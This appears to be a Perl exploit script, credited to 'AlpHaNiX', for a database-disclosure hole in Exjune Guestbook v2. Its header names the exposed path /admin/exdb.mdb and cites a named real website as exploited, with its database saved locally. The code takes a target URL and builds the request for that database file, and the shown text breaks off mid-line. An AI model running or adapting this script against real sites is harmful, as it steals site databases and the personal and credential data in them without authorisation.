1 #!/usr/bin/perl
2 # By AlpHaNiX [NullArea.Net]
3 # alpha[at]hacker.bz
4 # Made in Tunisia
5 ###########
6 # script : Exjune Guestbook v2
7 # download : http://www.exjune.com/downloads/downloads/exJune_guestbook.asp
8 ###########
9 # Vulnerable :
10 # database path : /admin/exdb.mdb
11 ##########
12 # Real Life Example :
13 #
14 #
15 # OOO OOO OO OO OO
16 # OO O O O O
17 # O O O OO OO O O O O OO OOO OOOO OOOOO
18 # O O O O O O O OOO OO OOOOOO O
19 # O OO O O O O O O O O OOOOOO
20 # OOO OO OOOOO OOOOO OOOOO OOO OOO OOOOO OOOOO OOOO OO
21 #
22 #
23 #[−] Exjune Guestbook v2 Remote Database Disclosure Exploit
24 #[−] Found & Exploited By AlpHaNiX
25 #
26 #
27 #[!] Exploiting http://www.ladyslipperretreat.com/guestbook// ....
28 #[+] http://www.ladyslipperretreat.com/guestbook// Exploited ! Database saved to c:/db.mdb
29 ##########
30 # Greetz for Zigma/Djek/unary/r1z
31
32
33 use lwp::UserAgent;
34
35 system(’cls’);
36 system(’title Exjune Guestbook v2 Remote Database Disclosure Exploit’);
37 system(’color 2’);
38 if (!defined($ARGV[0])) {print "[!] Usage : \n ./exploit http://site.com\n";exit();}
39 if ($ARGV[0] =~ /http:\/\// ) { $site = $ARGV[0]."/"; } else { $site = "http://".$ARGV[0]."/"; }
40 print "\n\n\n\n OOO OOO OO OO OO\n" ;
41 print " OO O O O O\n" ;
42 print " O O O OO OO O O O O OO OOO OOOO OOOOO\n" ;
43 print " O O O O O O O OOO OO OOOOOO O\n" ;
44 print " O OO O O O O O O O O OOOOOO\n" ;
45 print " OOO OO OOOOO OOOOO OOOOO OOO OOO OOOOO OOOOO OOOO OO\n" ;
46 print "\n\n[−] Exjune Guestbook v2 Remote Database Disclosure Exploit\n";
47 print "[−] Found & Exploited By AlpHaNiX \n\n\n";
48 print "[!] Exploiting $site ....\n";
49 my $site = $ARGV[0] ;
50 my $target = $site."/admin/exdb.md